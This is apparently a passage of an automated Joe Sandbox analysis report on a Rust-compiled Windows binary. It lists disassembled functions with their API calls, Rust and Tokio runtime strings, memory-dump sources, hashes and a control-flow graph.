                                                                                          • Instruction ID: f74df729da61e4aad2efe165c35444e3da1b76915c613823d5e675662704b90c
                                                                                          • Opcode Fuzzy Hash: 98742759fcaf2ca1b966d418caaf78190908407d66327c2c790d65e6ccc64bba
                                                                                          • Instruction Fuzzy Hash: 38122562A09BC1C2E6619F29E5403EAF3A4FF98744F849225DF8C03795EF38E196C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA8FC0 Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 174memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$CloseHandlememcpy
                                                                                          • String ID: %0A
                                                                                          • API String ID: 2532389815-525998828
                                                                                          • Opcode ID: 4b9e13e25a3ab0bd0bfce28305c30a1d2f563f0d5335562d969b830045bd1930
                                                                                          • Instruction ID: a8d50ef49170ebd6891b0670bc9403f30228ce0fe50984cc412d0a3c18205ba2
                                                                                          • Opcode Fuzzy Hash: 4b9e13e25a3ab0bd0bfce28305c30a1d2f563f0d5335562d969b830045bd1930
                                                                                          • Instruction Fuzzy Hash: 6E913F75A08BC2C5E731AF21D8583E9E3A5FF48B88F844136DA1D0BB98DF389645C354
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA8FBB Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 173memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$CloseHandlememcpy
                                                                                          • String ID: %0A
                                                                                          • API String ID: 2532389815-525998828
                                                                                          • Opcode ID: 863ea3cb972e3b97bec60bdd1e478e09c420a07950e09a43baaf2ecc091d48b3
                                                                                          • Instruction ID: 579cfe054771293db3fee4ef31946778dcbc4548220938b8e1bff79c50a7a29f
                                                                                          • Opcode Fuzzy Hash: 863ea3cb972e3b97bec60bdd1e478e09c420a07950e09a43baaf2ecc091d48b3
                                                                                          • Instruction Fuzzy Hash: 4C914F75908BC2C5E731AF21D8583E8E3A5FF48B88F844136DA1D0BB98DF39A645C358
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA0E0B Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 404memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15509 7ff768ba0e0b-7ff768ba0e45 call 7ff768c62660 15512 7ff768ba0e47-7ff768ba0e51 call 7ff768bf8770 15509->15512 15513 7ff768ba0e5a-7ff768ba0e5d 15509->15513 15520 7ff768bac259-7ff768bac27a 15512->15520 15521 7ff768ba0e57 15512->15521 15515 7ff768ba0e63-7ff768ba0e9c call 7ff768dba73a 15513->15515 15516 7ff768babf7e-7ff768babf90 15513->15516 15524 7ff768ba0ea3 15515->15524 15523 7ff768babebd-7ff768babf10 call 7ff768dba540 call 7ff768dba1e0 call 7ff768bb0250 15516->15523 15525 7ff768bac6ae-7ff768bac6d0 15520->15525 15521->15513 15526 7ff768ba0eaa-7ff768ba0eae 15524->15526 15537 7ff768bac6ef-7ff768bac700 15525->15537 15529 7ff768ba0eb0-7ff768ba0eba 15526->15529 15530 7ff768ba0ef8-7ff768ba0f10 15526->15530 15532 7ff768ba0ee0-7ff768ba0ee6 call 7ff768bf8a07 15529->15532 15533 7ff768ba0ebc-7ff768ba0ec4 15529->15533 15530->15526 15531 7ff768ba0f12-7ff768ba0f20 15530->15531 15538 7ff768ba0f22-7ff768ba0f30 15531->15538 15539 7ff768ba0f55-7ff768ba0f8c call 7ff768bf799f 15531->15539 15543 7ff768ba0eeb-7ff768ba0ef6 15532->15543 15533->15532 15540 7ff768ba0ec6-7ff768ba0ede call 7ff768bf8afb 15533->15540 15537->15523 15544 7ff768ba0f32-7ff768ba0f3a call 7ff768bf5c14 15538->15544 15545 7ff768ba0f41-7ff768ba0f53 15538->15545 15550 7ff768ba0f91-7ff768ba0f94 15539->15550 15540->15543 15543->15530 15544->15545 15545->15550 15550->15524 15553 7ff768ba0f9a-7ff768ba1011 call 7ff768bf89cd call 7ff768bb09e0 15550->15553 15563 7ff768ba1013-7ff768ba1023 HeapFree 15553->15563 15564 7ff768ba1029-7ff768ba102e 15553->15564 15563->15564 15566 7ff768ba1030-7ff768ba103d HeapFree 15564->15566 15567 7ff768ba1043-7ff768ba10b7 call 7ff768c69160 call 7ff768c66120 15564->15567 15566->15567 15567->15537 15573 7ff768ba10bd-7ff768ba10cb CoInitializeEx 15567->15573 15573->15525 15574 7ff768ba10d1-7ff768ba1106 CoInitializeSecurity 15573->15574 15574->15525 15575 7ff768ba110c-7ff768ba11ee call 7ff768c62660 call 7ff768b7c8c1 call 7ff768bb09e0 15574->15575 15582 7ff768ba11f0-7ff768ba11fc HeapFree 15575->15582 15583 7ff768ba1202-7ff768ba1243 call 7ff768c67140 15575->15583 15582->15583 15586 7ff768ba1245-7ff768ba1258 15583->15586 15587 7ff768ba125a-7ff768ba1274 15583->15587 15588 7ff768ba127a-7ff768ba12b5 call 7ff768b7875f call 7ff768b754e5 15586->15588 15587->15588 15589 7ff768bac759-7ff768bac834 call 7ff768c77f20 call 7ff768db9f8d call 7ff768c61400 15587->15589 15598 7ff768bac705-7ff768bac716 15588->15598 15599 7ff768ba12bb-7ff768ba1382 CloseHandle call 7ff768b7cf9e call 7ff768bb09e0 call 7ff768b754e5 15588->15599 15598->15523 15609 7ff768ba1387-7ff768ba138a 15599->15609 15610 7ff768ba1390-7ff768ba13e3 call 7ff768b7dd35 15609->15610 15611 7ff768bac71b-7ff768bac72c 15609->15611 15614 7ff768ba13ea-7ff768ba148c 15610->15614 15611->15523 15614->15614 15615 7ff768ba1492-7ff768ba14d4 15614->15615 15615->15523
                                                                                          APIs
                                                                                          Strings
                                                                                          • cannot access a Thread Local Storage value during or after destruction/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483\library\std\src\thread\local.rs, xrefs: 00007FF768BAC265
                                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00007FF768BA0E9C
                                                                                          • called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 00007FF768BAC76E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$ErrorLast$ExclusiveInitializeLock$AcquireCloseHandleReleaseSecuritymemcpy
                                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destruction/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483\library\std\src\thread\local.rs
                                                                                          • API String ID: 1527936389-1546417403
                                                                                          • Opcode ID: 11ff5e480039a9000d1e44b0dae6ae2433496bb9c81c0df961b0633ed76fc422
                                                                                          • Instruction ID: 48c2dd8d2768b513abb4c957d32d0108cff7b67c202bbcdfa16c519d8af55664
                                                                                          • Opcode Fuzzy Hash: 11ff5e480039a9000d1e44b0dae6ae2433496bb9c81c0df961b0633ed76fc422
                                                                                          • Instruction Fuzzy Hash: 33228A32608B81C9EB25DF24E8543EDB7A5FB48788F804136DA8D4BB55DF38E255C364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BF5042 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 185filenativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AcquireCompletionCreateExclusiveFileLock$ErrorModesNotificationPortStatus
                                                                                          • String ID: called `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 534304965-2333694755
                                                                                          • Opcode ID: f4534296d8edc760079f3f41d90fa6aa536cc0e28e81dc681e3346a5597ee4ee
                                                                                          • Instruction ID: 38914ef84b163211dd28f4e785a37b801dbc0d9830ba8f7805091dd5d7c75260
                                                                                          • Opcode Fuzzy Hash: f4534296d8edc760079f3f41d90fa6aa536cc0e28e81dc681e3346a5597ee4ee
                                                                                          • Instruction Fuzzy Hash: 4371A172A09B41C2EB50AF64E4503AAF3A4FF88790F848135DA9D43B94DF3CE449C768
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B741DD Relevance: 12.9, APIs: 10, Instructions: 434memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: f98d5078c2e4b985f606d67e1b0daeb6716cbec906b57f445b35496b0c09bf96
                                                                                          • Instruction ID: 1eef8a8232ab96ff6ec0ef5ec1a7e5ff2483f43400071f51d2732f87d9ac4b52
                                                                                          • Opcode Fuzzy Hash: f98d5078c2e4b985f606d67e1b0daeb6716cbec906b57f445b35496b0c09bf96
                                                                                          • Instruction Fuzzy Hash: 2E22106661DB8086E7709B1AB44036AFBA0FB89B84F545126EBCD43B69CF3CD155CB00
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C640C0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118filelibrarynativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressFileHandleModuleObjectProcReadSingleWait
                                                                                          • String ID: NtReadFile$failed to write whole buffer$ntdll
                                                                                          • API String ID: 4023487854-3207078225
                                                                                          • Opcode ID: 63895a9d67ac020e408b2bdda1932fc58e30f4795b70b8519dcfd54bac81c4f4
                                                                                          • Instruction ID: c092375b9175738da091245ef880be42e7a7c8eb73a8c54a7714dcae03777088
                                                                                          • Opcode Fuzzy Hash: 63895a9d67ac020e408b2bdda1932fc58e30f4795b70b8519dcfd54bac81c4f4
                                                                                          • Instruction Fuzzy Hash: 94519131A08B85C5EB609B11F8503AAF3A5FF98794F944235EA8C437A4EF7CD094C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C8323C Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 442COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • assertion failed: shared.shutdown_tx.is_some()C:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.26.0\src\runtime\blocking\pool.rs, xrefs: 00007FF768C838B9
                                                                                          • thread name may not contain interior null bytes, xrefs: 00007FF768C83906
                                                                                          • failed to write whole buffer, xrefs: 00007FF768C83948
                                                                                          • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF768C8389B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AcquireConditionExclusiveLockVariableWake
                                                                                          • String ID: assertion failed: prev.ref_count() >= 1$assertion failed: shared.shutdown_tx.is_some()C:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.26.0\src\runtime\blocking\pool.rs$failed to write whole buffer$thread name may not contain interior null bytes
                                                                                          • API String ID: 2350203089-3341931606
                                                                                          • Opcode ID: e5dc4d85ec35a2edb9d594ba88f40f866d9b21c339658c7661a028fc66e9b46b
                                                                                          • Instruction ID: 0034ede3dd2b29007488cf430f49aae2f1f2979dff9c979863d92a5e27d8a8c2
                                                                                          • Opcode Fuzzy Hash: e5dc4d85ec35a2edb9d594ba88f40f866d9b21c339658c7661a028fc66e9b46b
                                                                                          • Instruction Fuzzy Hash: 0C12AEB2A09B82C5EB51AF29D401369E7A0EF84B84F849536EE4D07795EF3CE445C324
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C80B73 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 396COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF768C80BA9
                                                                                          • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF768C811B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AcquireConditionExclusiveLockSleepVariable
                                                                                          • String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$called `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 97112084-3163332627
                                                                                          • Opcode ID: 08ddf07b21fa87a7fe679a99310cc836f5e164f041f3a254ea941ce34473bb85
                                                                                          • Instruction ID: 92d61fea903ee906b167aef17ac5048f41b9a1f38f6799d35e27014b2761c707
                                                                                          • Opcode Fuzzy Hash: 08ddf07b21fa87a7fe679a99310cc836f5e164f041f3a254ea941ce34473bb85
                                                                                          • Instruction Fuzzy Hash: F7F103B2A0AB85C2EB60EB19E4003BAE7A5FF44B84F854136DA5D47794DF3CE486C314
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C67140 Relevance: 10.7, APIs: 7, Instructions: 157memoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$CloseFileFind$CreateFirstHandlePrivilegeReleasememset
                                                                                          • String ID:
                                                                                          • API String ID: 670632328-0
                                                                                          • Opcode ID: 2c7413c70f955810b8965680b9e24c34f1771ea86c38bc986b7be773ff077aca
                                                                                          • Instruction ID: d4cc7d3337d489ed9620b24298d904c64c5f06f8d54a55f474ef8f66a5f90a73
                                                                                          • Opcode Fuzzy Hash: 2c7413c70f955810b8965680b9e24c34f1771ea86c38bc986b7be773ff077aca
                                                                                          • Instruction Fuzzy Hash: 87619A32A04B82C5E720DF62E8887ADB3A5FB48B98F448235DE1D1B794CF38D585C358
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B7691C Relevance: 9.4, APIs: 3, Strings: 3, Instructions: 426memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Large file option has not been setShould have switched to stored beforehand, xrefs: 00007FF768B76869
                                                                                          • Extra data size exceeds extra fieldNo custom ZIP64 extra data allowedFileNotFoundUnsupportedArchive, xrefs: 00007FF768B76848
                                                                                          • called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 00007FF768B768E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$FilePointermemcpy
                                                                                          • String ID: Extra data size exceeds extra fieldNo custom ZIP64 extra data allowedFileNotFoundUnsupportedArchive$Large file option has not been setShould have switched to stored beforehand$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 1254189466-2054439489
                                                                                          • Opcode ID: a822c6bc765aef4786f9306b1a8ff08ee8eb23dc8571e7f6c5697321c1c6cea3
                                                                                          • Instruction ID: 4f4128670f00a4ff7823ec9099c35c0659f643e910a784f2dd65250d39e189d2
                                                                                          • Opcode Fuzzy Hash: a822c6bc765aef4786f9306b1a8ff08ee8eb23dc8571e7f6c5697321c1c6cea3
                                                                                          • Instruction Fuzzy Hash: 59029E6272A741C1EE65AF05E00036AE3A1EF4AB94F849035EF9E07BD5EF3CE5448718
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C80923 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,?,00007FF768C84AF1), ref: 00007FF768C8099D
                                                                                          Strings
                                                                                          • assertion failed: !handle.is_shutdown(), xrefs: 00007FF768C80B59
                                                                                          • A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!C:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.26.0\src\runtime\schedu, xrefs: 00007FF768C80B3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AcquireExclusiveLock
                                                                                          • String ID: A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!C:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.26.0\src\runtime\schedu$assertion failed: !handle.is_shutdown()
                                                                                          • API String ID: 4021432409-3902975484
                                                                                          • Opcode ID: afcb7bb7ad93fec4aa6cb9711c578027d4373bf23bea39b4871396d9a1785f7e
                                                                                          • Instruction ID: c6bbe7053812e9816b3b2db746ab0ff55a375741e8118f2d519937b487fd8df4
                                                                                          • Opcode Fuzzy Hash: afcb7bb7ad93fec4aa6cb9711c578027d4373bf23bea39b4871396d9a1785f7e
                                                                                          • Instruction Fuzzy Hash: 85C1A172649BC186EA749F15F4807AAF7A4FB84794F944236DAAE43B94CE3CD081C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C5CEC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87filenativesynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileObjectSingleWaitWrite
                                                                                          • String ID: failed to write whole buffer
                                                                                          • API String ID: 1507886151-3341736086
                                                                                          • Opcode ID: 6fd50c973436eed9b3db14f341b082b269a20317f32a80afc31375045983e16a
                                                                                          • Instruction ID: fd6f5b6758649a2ec3ed42b3073458a8137c9d44b71be54661948c642dfa002c
                                                                                          • Opcode Fuzzy Hash: 6fd50c973436eed9b3db14f341b082b269a20317f32a80afc31375045983e16a
                                                                                          • Instruction Fuzzy Hash: 1C312C32A08B85C5E760DB24F4403AAF7A4FB89754F904235EA8C43BA8DF7CD098CB55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C7E54E Relevance: 5.1, Strings: 4, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: arenegyl$modnarod$setybdet$uespemos
                                                                                          • API String ID: 0-66988881
                                                                                          • Opcode ID: ae7340110344aed68a8fe7cac1fd8ea4c669912e9b63e99efb2c1528fe267092
                                                                                          • Instruction ID: 6c4947f16ecad77cb2866d934c37f461783378e91b8eb1fd6bfc0298778be956
                                                                                          • Opcode Fuzzy Hash: ae7340110344aed68a8fe7cac1fd8ea4c669912e9b63e99efb2c1528fe267092
                                                                                          • Instruction Fuzzy Hash: E931C2F2B11B0043FFA4EB65BE6432AA253A7487E0E44E431CE8D87B0DEF2DE1518244
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C99DF8 Relevance: 4.2, APIs: 3, Instructions: 414memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
